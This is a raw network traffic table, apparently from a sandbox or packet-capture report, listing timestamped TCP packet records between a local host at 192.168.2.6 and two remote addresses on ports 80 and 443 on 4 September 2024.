Sep 4, 2024 17:37:09.717091084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717108011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717117071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717147112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717161894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717170954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717180967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717181921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717190027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717190981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717206001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717206001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717216015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717216969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717226982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717230082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717248917 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717259884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717259884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717370033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717413902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717510939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717521906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717530012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717551947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717562914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717567921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717567921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717575073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717586994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717596054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717597008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717607021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717607975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717618942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717628002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717628956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717639923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717650890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717653990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717664003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717667103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717678070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717690945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717711926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717854023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717864037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717885971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717885971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717904091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717919111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717931032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717938900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717948914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717950106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717966080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717976093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.717991114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.717999935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718019962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718053102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718087912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718141079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718153954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718163013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718173981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718183994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718193054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718195915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718195915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718234062 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718801022 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718825102 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718841076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718858004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718868017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.718894958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.718904018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.719041109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.719052076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.719062090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.719072104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.719079971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.719109058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.721138000 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721153975 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721198082 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.721221924 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721252918 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.721438885 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721453905 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721491098 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.721497059 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721507072 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.721532106 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.721781969 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721795082 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721839905 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.721847057 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.721884966 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.723685980 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.723702908 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.723740101 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.723747015 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.723763943 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.723792076 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.723965883 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.723978996 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.724008083 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.724013090 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.724035978 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.724047899 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.725164890 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.725178957 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.725234032 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.725240946 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.725276947 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.726368904 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.726383924 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.726423025 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.726430893 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.726442099 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.726466894 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.726653099 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.726666927 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.726701021 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.726706982 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.726728916 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.726736069 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.733263969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733275890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733284950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733299971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.733319998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.733355045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733364105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733372927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733383894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733388901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.733400106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.733421087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.733939886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733952045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733959913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.733984947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.733998060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734009981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734036922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734070063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734083891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734091043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734101057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734107971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734116077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734121084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734132051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734133005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734143972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734157085 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734178066 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734296083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734306097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734314919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734330893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734339952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734339952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734359026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734381914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734405041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734412909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734440088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734762907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734775066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734782934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734803915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734822989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.734834909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734844923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.734869957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735409975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735455036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735461950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735474110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735503912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735522032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735546112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735554934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735563993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735573053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735579967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735584021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735599041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735601902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735613108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735619068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735624075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735635042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735637903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735651970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735670090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735771894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735785007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735795021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735812902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735826015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735832930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735836029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735846043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735855103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735865116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735889912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735907078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735918045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735927105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.735940933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735959053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.735971928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736109018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736123085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736130953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736140013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736150026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736155987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736166000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736171961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736176968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736191988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736207962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736264944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736274958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736303091 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736390114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736399889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736408949 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736432076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736443996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736536980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736546040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736555099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736562967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736572027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736582994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736583948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736591101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736603975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736625910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736778975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736790895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736799002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.736818075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.736830950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737071991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737082005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737090111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737097979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737107992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737112999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737118006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737119913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737128973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737138033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737139940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737149000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737158060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737163067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737173080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737200975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737375021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737390995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737416983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737441063 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737559080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737569094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737577915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737601042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737622023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737633944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737647057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737656116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737663984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737667084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737678051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737695932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737725973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737744093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737754107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737761021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737763882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737775087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737778902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737786055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737788916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737797022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737807035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737808943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737832069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737849951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737945080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737955093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737962961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737972021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737981081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.737989902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.737991095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738002062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738006115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738019943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738044024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738045931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738059998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738070965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738080025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738082886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738091946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738092899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738102913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738116980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738127947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738158941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738169909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738183975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738190889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738200903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738212109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738213062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738223076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.738233089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738250017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.738266945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.790539026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790550947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790564060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.790604115 CEST	49717	80	192.168.2.6	147.45.44.104
